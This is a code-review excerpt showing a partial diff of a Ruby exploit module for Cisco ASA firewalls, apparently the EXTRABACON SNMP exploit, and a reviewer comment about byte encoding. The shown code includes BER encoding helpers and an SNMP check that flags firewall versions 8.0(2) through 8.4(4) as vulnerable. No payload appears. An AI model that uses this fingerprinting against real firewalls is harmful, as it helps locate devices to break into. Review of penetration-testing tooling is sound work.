modules/exploits/firewall/extrabacon.rb

```diff
@@ -0,0 +1,371 @@
+  # borrowing heavily from ruby-net-ldap
+
+  def ber_encode(x)
+    lst=[]
+    retbuf = ""
+    y = make_integers(x.split("."))
+    for z in y
+      lst << z
+    end
+    retbuf << (43).chr
+    for i in 2...lst.length
+      if lst[i] < 0x80
+        retbuf << lst[i].chr
+      else
+        octets = ""
+        n = lst[i]
+        begin
+          octets = (n & 0x7f | 0x80).chr << octets
+          n = n >> 7
+        end until n == 0
+        octets[-1] = (octets[-1].ord & 0x7f).chr
+        retbuf << octets
+      end
+    end
+    return retbuf
+  end
+
+  def make_integers(list)
+    list.collect{|n| Integer(n)}
+  end
+
+  def check
+    target_asa  = datastore['RHOST']
+    target_port = datastore['RPORT']
+    comm        = datastore['Community']
+    exba_targets = Hash[
+                      "asa802" => "Cisco Adaptive Security Appliance Version 8.0(2)",
+                      "asa803" => "Cisco Adaptive Security Appliance Version 8.0(3)",
+                      "asa803-6" => "Cisco Adaptive Security Appliance Version 8.0(3)6",
+                      "asa804" => "Cisco Adaptive Security Appliance Version 8.0(4)",
+                      "asa804-32" => "Cisco Adaptive Security Appliance Version 8.0(4)32",
+                      "asa805" => "Cisco Adaptive Security Appliance Version 8.0(5)",
+                      "asa821" => "Cisco Adaptive Security Appliance Version 8.2(1)",
+                      "asa822" => "Cisco Adaptive Security Appliance Version 8.2(2)",
+                      "asa823" => "Cisco Adaptive Security Appliance Version 8.2(3)",
+                      "asa824" => "Cisco Adaptive Security Appliance Version 8.2(4)",
+                      "asa825" => "Cisco Adaptive Security Appliance Version 8.2(5)",
+                      "asa831" => "Cisco Adaptive Security Appliance Version 8.3(1)",
+                      "asa832" => "Cisco Adaptive Security Appliance Version 8.3(2)",
+                      "asa841" => "Cisco Adaptive Security Appliance Version 8.4(1)",
+                      "asa842" => "Cisco Adaptive Security Appliance Version 8.4(2)",
+                      "asa843" => "Cisco Adaptive Security Appliance Version 8.4(3)",
+                      "asa844" => "Cisco Adaptive Security Appliance Version 8.4(4)",
+                    ]
+
+
+    manager = SNMP::Manager.new(:host => target_asa, :port => target_port, :community => comm)
+
+    resp = manager.get(["sysDescr.0"])
+    resp.each_varbind do |vb|
+      if exba_targets.has_value?(vb.value.to_s)
+        print_status("[#{target_asa}]: Vulnerable target detected: #{vb.value.to_s}\n")
+        return Exploit::CheckCode::Vulnerable
+      else
+        print_warning("Unable to determine if target is vulnerable.  Response: #{vb.value.to_s}")
+        return Exploit::CheckCode::Unknown
+      end
+    end
+  end
+
+  # TODO: write code that is actually type aware
+
+  def my_tlv(tag="\x30\x82", data)
+    ln = 0
+    p = ""
+    p.force_encoding('binary')
```

Comment:
You shouldn't need force_encoding *anywhere* in this module, as its handled by the top-level encoding when the module itself is evaluated. The only place we have to explicit about byte encoding is when interacting with external libraries.